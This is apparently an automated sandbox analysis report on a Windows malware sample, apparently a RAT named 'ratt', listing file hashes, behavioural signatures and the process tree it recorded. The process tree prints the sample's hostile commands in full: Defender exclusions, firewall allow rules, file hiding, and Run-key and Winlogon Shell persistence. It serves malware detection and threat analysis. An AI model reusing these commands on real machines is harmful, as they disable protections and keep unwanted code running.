Analysis
-
max time kernel
38s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
02/08/2023, 00:06
Static task
static1
General
-
Target
b33a0e9c2e09064d89e3da2344bfd32fe889b9756d2a85a5cd57c8d02490236b.exe
-
Size
1.4MB
-
MD5
e77c02e0ea2b35aeb97c572ce9ef0b54
-
SHA1
9b5f4d22c526f90cdb86c9e29dacdda46c74a0db
-
SHA256
b33a0e9c2e09064d89e3da2344bfd32fe889b9756d2a85a5cd57c8d02490236b
-
SHA512
6b4fadaca6c2616816b55ff3f2f44c85f16c7b4474e88b4cb7861847796bd16fdf681a0855bf03aa99090b6f5882a962e089a5c9e1f7583aa689a698f9ad66cb
-
SSDEEP
24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk
Malware Config
Signatures
-
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 2720 netsh.exe 2116 netsh.exe -
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x00070000000231fc-234.dat acprotect behavioral1/files/0x00070000000231fc-235.dat acprotect -
Executes dropped EXE 1 IoCs
pid Process 2132 7z.exe -
Loads dropped DLL 1 IoCs
pid Process 2132 7z.exe -
resource yara_rule behavioral1/files/0x00070000000231fd-231.dat upx behavioral1/memory/2132-232-0x0000000000400000-0x0000000000432000-memory.dmp upx behavioral1/files/0x00070000000231fd-233.dat upx behavioral1/files/0x00070000000231fc-234.dat upx behavioral1/files/0x00070000000231fc-235.dat upx behavioral1/memory/2132-236-0x0000000010000000-0x00000000100E2000-memory.dmp upx behavioral1/memory/2132-240-0x0000000000400000-0x0000000000432000-memory.dmp upx -
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 208.67.222.222 Destination IP 208.67.222.222 Destination IP 208.67.222.222 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 1484 PING.EXE 3996 PING.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 3920 powershell.exe 3920 powershell.exe 972 powershell.exe 972 powershell.exe 4768 powershell.exe 4768 powershell.exe 668 powershell.exe 668 powershell.exe 5048 powershell.exe 5048 powershell.exe 3840 powershell.exe 3840 powershell.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 3120 WMIC.exe Token: SeSecurityPrivilege 3120 WMIC.exe Token: SeTakeOwnershipPrivilege 3120 WMIC.exe Token: SeLoadDriverPrivilege 3120 WMIC.exe Token: SeSystemProfilePrivilege 3120 WMIC.exe Token: SeSystemtimePrivilege 3120 WMIC.exe Token: SeProfSingleProcessPrivilege 3120 WMIC.exe Token: SeIncBasePriorityPrivilege 3120 WMIC.exe Token: SeCreatePagefilePrivilege 3120 WMIC.exe Token: SeBackupPrivilege 3120 WMIC.exe Token: SeRestorePrivilege 3120 WMIC.exe Token: SeShutdownPrivilege 3120 WMIC.exe Token: SeDebugPrivilege 3120 WMIC.exe Token: SeSystemEnvironmentPrivilege 3120 WMIC.exe Token: SeRemoteShutdownPrivilege 3120 WMIC.exe Token: SeUndockPrivilege 3120 WMIC.exe Token: SeManageVolumePrivilege 3120 WMIC.exe Token: 33 3120 WMIC.exe Token: 34 3120 WMIC.exe Token: 35 3120 WMIC.exe Token: 36 3120 WMIC.exe Token: SeIncreaseQuotaPrivilege 3120 WMIC.exe Token: SeSecurityPrivilege 3120 WMIC.exe Token: SeTakeOwnershipPrivilege 3120 WMIC.exe Token: SeLoadDriverPrivilege 3120 WMIC.exe Token: SeSystemProfilePrivilege 3120 WMIC.exe Token: SeSystemtimePrivilege 3120 WMIC.exe Token: SeProfSingleProcessPrivilege 3120 WMIC.exe Token: SeIncBasePriorityPrivilege 3120 WMIC.exe Token: SeCreatePagefilePrivilege 3120 WMIC.exe Token: SeBackupPrivilege 3120 WMIC.exe Token: SeRestorePrivilege 3120 WMIC.exe Token: SeShutdownPrivilege 3120 WMIC.exe Token: SeDebugPrivilege 3120 WMIC.exe Token: SeSystemEnvironmentPrivilege 3120 WMIC.exe Token: SeRemoteShutdownPrivilege 3120 WMIC.exe Token: SeUndockPrivilege 3120 WMIC.exe Token: SeManageVolumePrivilege 3120 WMIC.exe Token: 33 3120 WMIC.exe Token: 34 3120 WMIC.exe Token: 35 3120 WMIC.exe Token: 36 3120 WMIC.exe Token: SeDebugPrivilege 3920 powershell.exe Token: SeDebugPrivilege 972 powershell.exe Token: SeDebugPrivilege 4768 powershell.exe Token: SeDebugPrivilege 668 powershell.exe Token: SeDebugPrivilege 5048 powershell.exe Token: SeDebugPrivilege 3840 powershell.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 1820 wrote to memory of 1136 1820 b33a0e9c2e09064d89e3da2344bfd32fe889b9756d2a85a5cd57c8d02490236b.exe 84 PID 1820 wrote to memory of 1136 1820 b33a0e9c2e09064d89e3da2344bfd32fe889b9756d2a85a5cd57c8d02490236b.exe 84 PID 1820 wrote to memory of 1136 1820 b33a0e9c2e09064d89e3da2344bfd32fe889b9756d2a85a5cd57c8d02490236b.exe 84 PID 1136 wrote to memory of 4616 1136 cmd.exe 87 PID 1136 wrote to memory of 4616 1136 cmd.exe 87 PID 1136 wrote to memory of 4616 1136 cmd.exe 87 PID 4616 wrote to memory of 2232 4616 cmd.exe 88 PID 4616 wrote to memory of 2232 4616 cmd.exe 88 PID 4616 wrote to memory of 2232 4616 cmd.exe 88 PID 1136 wrote to memory of 2072 1136 cmd.exe 89 PID 1136 wrote to memory of 2072 1136 cmd.exe 89 PID 1136 wrote to memory of 2072 1136 cmd.exe 89 PID 2072 wrote to memory of 3120 2072 cmd.exe 90 PID 2072 wrote to memory of 3120 2072 cmd.exe 90 PID 2072 wrote to memory of 3120 2072 cmd.exe 90 PID 1136 wrote to memory of 3920 1136 cmd.exe 92 PID 1136 wrote to memory of 3920 1136 cmd.exe 92 PID 1136 wrote to memory of 3920 1136 cmd.exe 92 PID 1136 wrote to memory of 972 1136 cmd.exe 96 PID 1136 wrote to memory of 972 1136 cmd.exe 96 PID 1136 wrote to memory of 972 1136 cmd.exe 96 PID 1136 wrote to memory of 4768 1136 cmd.exe 97 PID 1136 wrote to memory of 4768 1136 cmd.exe 97 PID 1136 wrote to memory of 4768 1136 cmd.exe 97 PID 1136 wrote to memory of 668 1136 cmd.exe 99 PID 1136 wrote to memory of 668 1136 cmd.exe 99 PID 1136 wrote to memory of 668 1136 cmd.exe 99 PID 1136 wrote to memory of 5048 1136 cmd.exe 101 PID 1136 wrote to memory of 5048 1136 cmd.exe 101 PID 1136 wrote to memory of 5048 1136 cmd.exe 101 PID 1136 wrote to memory of 2132 1136 cmd.exe 103 PID 1136 wrote to memory of 2132 1136 cmd.exe 103 PID 1136 wrote to memory of 2132 1136 cmd.exe 103 PID 1136 wrote to memory of 3840 1136 cmd.exe 104 PID 1136 wrote to memory of 3840 1136 cmd.exe 104 PID 1136 wrote to memory of 3840 1136 cmd.exe 104 PID 3840 wrote to memory of 2720 3840 powershell.exe 107 PID 3840 wrote to memory of 2720 3840 powershell.exe 107 PID 3840 wrote to memory of 2720 3840 powershell.exe 107 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3020 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b33a0e9c2e09064d89e3da2344bfd32fe889b9756d2a85a5cd57c8d02490236b.exe"C:\Users\Admin\AppData\Local\Temp\b33a0e9c2e09064d89e3da2344bfd32fe889b9756d2a85a5cd57c8d02490236b.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com3⤵
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com4⤵PID:2232
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain3⤵
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic ComputerSystem get Domain4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3920
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:972
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:668
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5048
-
-
C:\Users\Admin\AppData\Local\Temp\7z.exe7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2132
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:2720
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:2116
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:1624
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic computersystem where name="KHQJMFWR" set AutomaticManagedPagefile=False5⤵PID:3912
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:5108
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=200005⤵PID:864
-
-
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"4⤵PID:1116
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 8 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"5⤵PID:2764
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 86⤵
- Runs ping.exe
PID:1484
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"6⤵PID:2488
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 16 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 16 > nul && "C:\Users\Admin\Music\rot.exe"5⤵PID:4360
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 166⤵
- Runs ping.exe
PID:3996
-
-
-
-
C:\Windows\SysWOW64\attrib.exe"C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"4⤵
- Views/modifies file attributes
PID:3020
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F3⤵PID:4300
-
-
C:\Users\Admin\AppData\Local\Temp\ratt.exe"ratt.exe"3⤵PID:5040
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
577.2MB
MD5483d45ba64faa88d72679ae7ebc4ae2a
SHA154aa7a964166ab689dcece0a231c722b85466e9f
SHA256d65b8857f45e3c862db31832892a85bcec70feb60ded8662be580da8834476a4
SHA5127061fe715e65a2cbd015f2a79648bfdc7aaa6130bb73cb26a669f13a7ba08308689794cc7832680dcf88855c3c6dc7c91e536b3a08a2a1bb3f7043a6b77f108d
-
Filesize
354.0MB
MD5e07acc832498ed9b13da4ff4debd52d6
SHA114abcdbe1c747b98b6f1d63dfa77649badd022d3
SHA25690c06fa91ba4b239e83d5aa9dd90a1b45d98a8353886edcfcf38815e6d260f56
SHA512c35ea432d1f6df8aca1cdf61765c34b94bb73ca993276a5509302a06cdb32d2d3e716193463a5e1837bc1a99511d6fdc1bec525702123fa17af626d5e9d9bd2c
-
Filesize
1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
Filesize
11KB
MD51d6d466843d5ab49eeab0bb50f7c47eb
SHA11fbca4b666645b9e73d73538ffba3c4d484404bb
SHA2566e924b5c853cb96c572e7d2403e06065dd6581e15656dd71dc47f165b76dc1cf
SHA512ac4d4018d131ebef83698c88477bace09d12618a871d4ac19f4e3ad854f2efae2cbf58d76a853e85f09e3a909fdd04e468e0d359ca87f52ed9879339e3d0adf9
-
Filesize
11KB
MD505281810a6058c7c060344ed7f00e91d
SHA11f37d79440be5d87732e7e61ccc62bff5f6bb7be
SHA256f0200c486176915e8fa25aad40f2f84af2f054b41e9d25af3df7cc4f727977de
SHA51225b6d6202578e5f2f27ef8e148a294d1835e88e267870dd3aad01e3ce3f1006b695f8f90ab663fd02bfc16351a8188f79f0f84648ee9e001553682e612adf1da
-
Filesize
11KB
MD5b204066b6ad025f1244a5f1d043f5cf9
SHA1dd2aa2b82c5bcbb012099a99dd710ab8b043cbef
SHA25680f7e11b66702ca32a2e554b181825307eb318604fecb2cf29f3b3f16d9fcdef
SHA512509783a30e7c278b713a61b43372d639458f5591954a894c68409209818b4057e50fca30978d48dc6b8ab98b34f17b718cdc3bf0252b9a62fdbe8b6c584a0786
-
Filesize
11KB
MD5c5766095b9d9e8c0e29b8d1be0a7b146
SHA196124448b3dbd0d873e5cb51340659eebef415b6
SHA25697f92937476663546700262de8dc81d75a1c773820bbeb0d4dc98451a4c504b5
SHA5127cbab45d00a3e78e606a88867f7757457b134c6518363e25a671f36fd1321869c7b6f35e33fd9abee9ab97eb33c968d27448123cb8b7315833b99301f43d5e7d
-
Filesize
11KB
MD51f7320e3c13b82a7e44373cbeaec9a90
SHA1bcc3cfd8230365837fa9cb76dda979f436868539
SHA25622d1b5c3ebe94ab6f43d480046f0440d937f4001d96b351d09764b52cde969f5
SHA512bf8ce65cc2cc8672e995b5fb1dc29a299197a2974bba9f4d52a7b176e3b0c3c9851ea871c9d03f16bb7012fbf9d67406f0b6e394f3720e2b209e7c9842aa68a4
-
Filesize
328KB
MD515bbbe562f9be3e5dcbb834e635cc231
SHA17c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a
SHA256ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde
SHA512769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287
-
Filesize
328KB
MD515bbbe562f9be3e5dcbb834e635cc231
SHA17c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a
SHA256ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde
SHA512769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287
-
Filesize
71KB
MD58ba2e41b330ae9356e62eb63514cf82e
SHA18dc266467a5a0d587ed0181d4344581ef4ff30b2
SHA256ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea
SHA5122fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d
-
Filesize
71KB
MD58ba2e41b330ae9356e62eb63514cf82e
SHA18dc266467a5a0d587ed0181d4344581ef4ff30b2
SHA256ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea
SHA5122fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d
-
Filesize
1KB
MD50df43097e0f0acd04d9e17fb43d618b9
SHA169b3ade12cb228393a93624e65f41604a17c83b6
SHA256c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873
SHA51201ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
693KB
MD57de6fdf3629c73bf0c29a96fa23ae055
SHA1dcb37f6d43977601c6460b17387a89b9e4c0609a
SHA256069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff
SHA512d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8
-
Filesize
1KB
MD57ea1fec84d76294d9256ae3dca7676b2
SHA11e335451d1cbb6951bc77bf75430f4d983491342
SHA2569a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940
SHA512ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317
-
Filesize
745.1MB
MD5be788bb3680cf3809d9678ee6f7ba321
SHA1499f01d5f654f83e172004dcc03f99abdd251734
SHA25603a17a2b669f72df082569ea477977d824796da3b6b7a8d0e6f91f2629ef406b
SHA51283c0b885740a57b84b2c909d0d6bb25baaa49d62499773030b59058325f37a5fcf39a1cd59ef9c229ca7289af7250034f6652e449625b67c2d260b285ddb9a8e
-
Filesize
320.0MB
MD52ed9c0ade78245a8af35041f678ac076
SHA1ccf40a9aa8aabde0dbda3e71dabfad52b4403c3e
SHA2561a414977a96222dc8bf429a18a34d81cda8217503058381751fbed48e1584fd8
SHA512eee30942d9714fc4e81957947dcf4f2fd42eb8395b72dce9e2788bdd542d140d6876932d722b21f5a0cb5a1fb26a2524d748f0794dbf68c9479e94a7875c69c7